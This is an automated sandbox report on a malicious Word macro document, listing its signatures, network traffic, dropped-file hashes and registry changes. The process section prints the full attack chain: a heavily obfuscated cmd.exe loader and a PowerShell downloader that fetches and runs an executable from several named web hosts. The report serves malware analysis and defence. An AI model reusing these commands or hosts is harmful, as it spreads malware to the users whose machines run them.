Analysis Overview
SHA256
3cd982a08fa42bd51573f73b5eb53336e9fef97964b4eb9491153125266e9919
Threat Level: Known bad
The file 7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Office macro that triggers on suspicious action
Suspicious Office macro
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 01:33
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-29 01:33
Reported
2024-05-29 01:35
Platform
win10v2004-20240508-en
Max time kernel
137s
Max time network
135s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3492 wrote to memory of 4748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 3492 wrote to memory of 4748 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\SYSTEM32\cmd.exe |
| PID 4748 wrote to memory of 1216 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4748 wrote to memory of 1216 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc" /o ""
C:\Windows\SYSTEM32\cmd.exe
cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ ^:2^W^M^p^]^s^J^t^_^'^b^t^.^s^p^h^,%^0^@^?n^>^J^s^;^g^b^3^F^4^p^z^w/v^#^;^1J^{^\^8^x^,CV^l^T-^=^d^X^]^d^w^\^K^H/^q^[^5^e^i^}^,^d^&^m^@^.^~n^>^d^z^.Nn^X%^ha^>aC^t^h^}:^s^KV^u^o^W^&^lt/^:r^o^{v^-^h^|^@^7^p^u^>^E^.^B(^T^w^Y^b^P^w^]5I^w^1^Pn/^`^Z^8/^{^X^i^:r^e^f^p^F^]^#^tn7N^t^P^pC^h^sk^x@^Z^=^6^I^Q^b^O^3^l^q^*N^O^8^\^K^4?^0^a^l^3^.^6^A^5/^x^\^o^5^7^+^X^h^h^.^B^*/^d4^<o^t^O^;r^])^F^.H^P^ie^I^s^:^u^x^H^E^q^|^K^A^i^Y/^E^f^[^>V^i^J^F^on^O^{^Y^i^2^9^S^a^M^u^`r^?^8^p^t^w^?^q^.{^P^A^wd^#r^w^u^}^$^w^W^s^o/^m^`^u/^e^1^{^:^L^pr^p^&^FY^t^Y^@^k^t^D^0^?h^9^]8^@@^5^sv^;^5^E^d^Y^U^|^P^WN^2^U^q^h^4^uC^=^?^O^`^wN^p^\^I^.^3h^A^G^1^K^S^H/^L^F^'^e^#^[^*^iR(^|^pR^Jr^t ^M^U^o^*^,^f^s^*^i^&/^>^a^-r^+%^Y^u^2^1^Qvv^x^2n^.6r^i^I^k^b^o^2^'^t^yc^U^4^t^2^m^J/^*^x^[^m^#^7^ ^o^*N^tc^s^}^m^.^I^EN^a^9^O^M^y^&N^tn^B^-^6^e^O^D^e^k^{^-C^s^.^M^p^d%bcn^Z^?^L^u^M^`^2^f^[^_^ar^J^?^}^i^|^qc^a^5^H^]^f^ R^B^.P^\a^w^D^GI^w^U%^u^w^{^_^}/^{^h^S/V^>^:^:^0^9^h^p^*^I^7^t+^G^~^t^y(^]^h^T^>^*^'^KV^9^=f^z{G^a^9^1^K^7^z*^ty^_^f^$i^A)^;^{^:^h^t~^\^`n^yv^Q^e^ ^j^d^i^Pc^?^lT^U^hC^F^A^4^b^K^@^\^e^Z^g^A^WcC^Q^.(^+^L^t^{^DW^e^[^5^mN)^g^f^ ^4i^Qt^[^\^*c^8^h^:^e^p^sV^j^}c^A^b^.^6ro^[^,^a^-~^h^]^wf^P^~^e^]^K^wnzR^Z=^X^}nn^l^3^s^b^wC^=^E^o^O^@^$^g^{^*^ ^j^b^wlC^|^4^l^,^z^A^e^1^_Qh^6^;^d^s^+)^hr{I^e^e^Xx^b^wN^]^xo^o^+^q^p&&^f^or /^L %^h ^in (^1^6^1^5^,^-^4^,^3)^d^o ^s^e^t ^F^0^Y^g=!^F^0^Y^g!!^f^i:~%^h,1!&&^i^f %^h=^=^3 c^a^l^l %^F^0^Y^g:^~^6%"###
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell $Ebn=new-object Net.WebClient;$tKG='http://www.fairfundskenya.com/tyoinvur/sotpie/13pOuUPdv@http://www.trainifique.ro/h7x6aKN3I@http://www.photostand.de/wdlxJvpbJ@http://abdullahsheikh.info/KN3C4IO@http://lamsanviet.com/8wdaoHMFq'.Split('@');$IKM = '134';$qzc=$env:public+'\'+$IKM+'.exe';foreach($fdj in $tKG){try{$Ebn.DownloadFile($fdj, $qzc);Invoke-Item $qzc;break;}catch{}} ###
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.fairfundskenya.com | udp |
| US | 8.8.8.8:53 | www.trainifique.ro | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 185.199.109.153:80 | www.trainifique.ro | tcp |
| US | 8.8.8.8:53 | trainifique.ro | udp |
| US | 185.199.111.153:443 | trainifique.ro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.photostand.de | udp |
| DE | 81.169.145.165:80 | www.photostand.de | tcp |
| DE | 81.169.145.165:443 | www.photostand.de | tcp |
| US | 8.8.8.8:53 | abdullahsheikh.info | udp |
| US | 8.8.8.8:53 | lamsanviet.com | udp |
| IN | 193.203.163.237:80 | lamsanviet.com | tcp |
| IN | 193.203.163.237:443 | lamsanviet.com | tcp |
| US | 8.8.8.8:53 | 153.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.145.169.81.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.163.203.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| NL | 23.62.61.162:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 2.17.251.23:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 162.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3492-2-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-3-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-4-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-1-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-0-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-5-0x00007FFC162CD000-0x00007FFC162CE000-memory.dmp
memory/3492-6-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-7-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-8-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-9-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-11-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-12-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp
memory/3492-10-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-13-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-14-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-15-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-16-0x00007FFBD3FE0000-0x00007FFBD3FF0000-memory.dmp
memory/3492-17-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-36-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-37-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-38-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/1216-42-0x000002BE4DE10000-0x000002BE4DE32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_udcmrd5m.2di.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\134.exe
| MD5 | 536033862cf0a0ae7b85c1edd0d9c4a7 |
| SHA1 | 19ca4a149ee98f366541db126cefcd15738cd1eb |
| SHA256 | 9c545472b33561bd18c5dfedbb5c9944a1bd90cb8f4edbdee2a5d75e773b9f36 |
| SHA512 | d53d92c563d4f8aba1578f1e52abdda70aec2506bf18439e653e360c285fc01eacc8fadb85b615b38635d9c8f569bb04960084e75e0f2df749059fe43ea32b44 |
C:\Users\Admin\AppData\Local\Temp\TCD81A1.tmp\sist02.xsl
| MD5 | f883b260a8d67082ea895c14bf56dd56 |
| SHA1 | 7954565c1f243d46ad3b1e2f1baf3281451fc14b |
| SHA256 | ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353 |
| SHA512 | d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e |
memory/3492-536-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-546-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-547-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-548-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-568-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-569-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-571-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-570-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-572-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 01:33
Reported
2024-05-29 01:35
Platform
win7-20240221-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
